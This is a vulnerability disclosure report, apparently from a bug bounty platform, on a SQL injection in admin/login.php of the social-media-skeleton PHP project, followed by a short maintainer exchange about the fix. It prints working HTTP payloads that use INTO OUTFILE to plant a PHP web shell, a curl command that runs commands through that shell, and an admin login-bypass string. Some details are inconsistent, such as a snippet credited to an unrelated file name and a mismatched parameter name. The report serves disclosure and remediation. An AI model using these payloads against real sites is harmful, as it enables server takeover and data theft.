Pre-Auth SQLi leading to RCE in Social Media Skeleton v1.0 in fobybus/social-media-skeleton
Reported on Aug 1st 2023
Summary
A SQL Injection vulnerability exists in Social Media Skeleton v1.0 via the username and password parameters in admin/login.php. Not to be confused with login.php, which properly escapes special characters.
Issue Description
SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability allows UNION based injections, which indirectly leads to RCE.
Improper authorization in a web application undermines its security by exposing sensitive functionalities and resources to unauthorized users. This particular authorization vulnerability allows an unauthorized user to access this resource. Improper authorization is a pervasive problem throughout this application.
The affected script takes values from a POST request and eventually concatenates them into a SQL query (admin/login.php, lines 4-5):

```php
$uemail=$_POST["email"];    // attacker-controlled, used without validation or escaping
$upass=$_POST["password"];  // attacker-controlled, used without validation or escaping
```

These values are then interpolated directly into the query string, so either one can be manipulated to carry a malicious payload (sell_return.php, lines 8-9):

```php
// string interpolation: a single quote in either value closes the literal and the rest is executed as SQL
$query="select * from admin where email='$uemail' and password='$upass'";
$result=mysqli_query($dbcon,$query);
```
Affected URL/Area
<host>/social-media-skeleton/admin/login.php
Risk Rating
- Risk: HIGH
- Difficulty to Exploit: LOW
CVSS Justification
- Attack Vector: Network
  The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).
- Attack Complexity: Low
  Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
- Privileges Required: None
  The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
- User Interaction: None
  The vulnerable system can be exploited without interaction from any user.
- Scope: Changed
  An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.
- Confidentiality: High
  There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.
- Integrity: High
  There is a total loss of data integrity.
- Availability: High
  There is a total loss of availability.
Steps to reproduce
The attacker sends this request:

```http
POST /social-media-skeleton/admin/login.php HTTP/1.1
Host: localhost
Content-Length: 124
Content-Type: application/x-www-form-urlencoded

email=1' UNION SELECT '<?php system($_GET["cmd"]); ?>','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' -- &password=anything
```

Or this request:

```http
POST /social-media-skeleton/admin/login.php HTTP/1.1
Host: localhost
Content-Length: 118
Content-Type: application/x-www-form-urlencoded

email=1&password=1' UNION SELECT '<?php system($_GET["cmd"]); ?>','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' --
```

The malicious PHP script can now be used to execute commands:

```shell
curl http://localhost/rce.php?cmd=whoami
```
Affected Demographic/User Base
Any users of this service for their social media are at risk of having their data stolen, manipulated, or destroyed. The host of this server is at risk of system compromise.
Recommended Fix
Do not pass user controlled data to SQL queries. Use prepared statements or parameterized queries instead.
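As an added illustration of that fix (example code written for this write-up, not code from the social-media-skeleton project), the vulnerable query-building pattern from admin/login.php is shown next to a parameterized replacement using mysqli prepared statements. It assumes a mysqli connection `$dbcon` and an `admin` table with `email` and `password` columns, as the original query implies; the function names `build_unsafe_query` and `admin_login` are hypothetical.

```php
<?php
// Added example; not code from the social-media-skeleton project.
// Assumes: $dbcon is an open mysqli connection and the `admin` table has
// `email` and `password` columns (inferred from the query in the report).

// The vulnerable pattern: PHP string interpolation builds SQL text from
// user input. A single quote in $uemail closes the literal, and whatever
// follows (UNION SELECT ..., INTO OUTFILE ..., -- ) is parsed as SQL.
function build_unsafe_query(string $uemail, string $upass): string
{
    return "select * from admin where email='$uemail' and password='$upass'";
}

// Hardened version: the SQL text is fixed and contains only placeholders.
// The server compiles it first; the user-supplied values are sent
// separately as bound parameters and can only ever be compared as data,
// so quotes, UNION or INTO OUTFILE inside them have no SQL meaning.
function admin_login(mysqli $dbcon, string $uemail, string $upass): ?array
{
    $stmt = $dbcon->prepare(
        'SELECT * FROM admin WHERE email = ? AND password = ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $dbcon->error);
    }
    // 'ss' declares both placeholders as string parameters
    $stmt->bind_param('ss', $uemail, $upass);
    $stmt->execute();
    // get_result() needs the mysqlnd driver; on older builds use bind_result()
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null; // null when no admin row matched
}

// How the login handler would call it (hypothetical handler code):
// $admin = admin_login($dbcon, $_POST['email'] ?? '', $_POST['password'] ?? '');
// if ($admin === null) { /* reject the login */ }
```

The design point is that parameterization removes the need to reason about escaping at all: no matter what characters the client sends, the query structure the server executes is the one the developer wrote. Note that `admin_login` keeps the original's direct comparison of the stored `password` value so the example stays focused on the injection; hashing stored credentials is a separate improvement the report does not cover.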
Note
For the issued CVE ID, please credit Michael Blunt as the discovering researcher. List contact email as michael@mik.bz. The author of this project has been contacted and this information has been shared.
Impact
Attack Scenario
An attacker who finds this system can forge a request to the admin/login.php endpoint and create a malicious PHP file. This PHP file can do anything the attacker wants within the confines of the server settings. This can result in remote code execution (RCE) and full control over the affected resource. Additionally, the attacker can spawn a reverse shell with the permissions of the user running the webapp.
This is a UNION-based injection, but it belongs to the broader class of SQL injection attacks, which attackers can use to modify, add, or delete data in the remote database.
The attacker could also use this vulnerability to log in as an administrator with the payload:

```http
username=1' OR '1=1' -- &password=anything
```
Occurrences
SECURITY.md
2 months ago
Great work @mblunt 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.
Sure thing! I noticed that there were other instances of SQLi throughout the codebase so I have updated them to use parameterized queries. Updated files:
- social-media-skeleton/admin/atask/add.php
- social-media-skeleton/admin/atask/setting.php
- social-media-skeleton/admin/login.php
- social-media-skeleton/tasks/updatels.php
Also a note about mysql_real_escape_string(). It is generally ok, and will prevent most attackers. However, it is not bulletproof. It can be bypassed in some weird edge cases, which is why parameterized queries are recommended practice.
I did not change the existing mysql_real_escape_string() in some files, like social-media-skeleton/login.php or social-media-skeleton/signup.php. The current implementation in these files is not vulnerable, but it's worth mentioning for a possible improvement.
Hope this helps!